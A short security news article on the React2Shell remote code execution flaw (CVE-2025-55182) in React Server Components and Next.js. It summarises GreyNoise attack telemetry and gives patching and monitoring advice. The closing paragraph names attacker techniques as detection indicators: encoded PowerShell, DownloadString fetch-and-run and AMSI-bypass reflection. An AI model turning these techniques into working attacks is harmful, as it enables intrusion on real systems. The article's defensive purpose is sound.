React2Shell Vulnerability Hit by 8.1 Million Attack Attempts

The React2Shell flaw exploits the RSC "Flight" protocol that underpins modern React Server Components and the Next.js framework. Because the protocol sits at the edge of application logic, a successful remote code execution can run with the same privileges as the production service, effectively handing attackers full control. The vulnerability’s discovery in late 2025 coincided with rapid adoption of server‑side rendering, making a large swath of web applications instantly vulnerable and prompting a swift response from security researchers.

GreyNoise’s telemetry reveals an unprecedented scale: more than 8.1 million exploit attempts, 8,163 distinct source IPs, and activity across 101 nations. Cloud providers, especially AWS, dominate the infrastructure, supplying over a third of the malicious traffic and illustrating how attackers leverage elastic, low‑cost compute to rotate IPs and evade static defenses. The diversity of JA4H and JA4T fingerprints, along with 70 k unique payloads, signals a highly automated, bot‑driven operation that can adapt quickly to defensive measures, turning the exploit into a commodity component of broader attack kits.

Defenders must act decisively. Immediate patching of React and Next.js versions that address CVE‑2025‑55182 is the most effective mitigation, complemented by dynamic blocklists that ingest GreyNoise’s real‑time feed to block churned IP ranges. Endpoint monitoring should focus on PowerShell execution with encoded commands, DownloadString usage, and the specific AMSI‑bypass reflection patterns observed. By coupling rapid patch deployment with robust telemetry and logging, organizations can contain the current wave and reduce exposure to future automated exploit campaigns targeting the React ecosystem.